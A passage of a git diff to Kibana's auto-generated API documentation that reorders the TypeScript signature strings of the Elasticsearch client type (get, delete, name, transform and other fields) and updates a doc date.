"GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -898,7 +948,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -924,33 +974,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -976,33 +1000,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1962,6 +1960,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -2421,7 +2421,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the elasticsearch cluster\non behalf of the internal Kibana user." ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -2489,7 +2539,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -2515,33 +2565,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -2567,33 +2591,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -3553,6 +3551,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -3624,7 +3624,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the elasticsearch cluster\non behalf of the user that initiated the request to the Kibana server." ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -3692,7 +3742,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -3718,33 +3768,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -3770,33 +3794,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -4756,6 +4754,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -5061,7 +5061,61 @@ "\nClient used to query the elasticsearch cluster.\n" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -5129,7 +5179,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -5155,33 +5205,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -5207,33 +5231,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -6193,6 +6191,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/kbn_core_elasticsearch_server.mdx b/api_docs/kbn_core_elasticsearch_server.mdx index 12976e6f288b5..3afc9a04c8629 100644 --- a/api_docs/kbn_core_elasticsearch_server.mdx +++ b/api_docs/kbn_core_elasticsearch_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-server title: "@kbn/core-elasticsearch-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-server'] --- import kbnCoreElasticsearchServerObj from './kbn_core_elasticsearch_server.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_server_internal.devdocs.json b/api_docs/kbn_core_elasticsearch_server_internal.devdocs.json index ba4100d6fd35d..d05f0fed58931 100644 --- a/api_docs/kbn_core_elasticsearch_server_internal.devdocs.json +++ b/api_docs/kbn_core_elasticsearch_server_internal.devdocs.json @@ -44,7 +44,61 @@ "label": "client", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -112,7 +162,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -138,33 +188,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -190,33 +214,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1176,6 +1174,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -1603,7 +1603,61 @@ "label": "internalClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -1671,7 +1721,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -1697,33 +1747,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -1749,33 +1773,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: 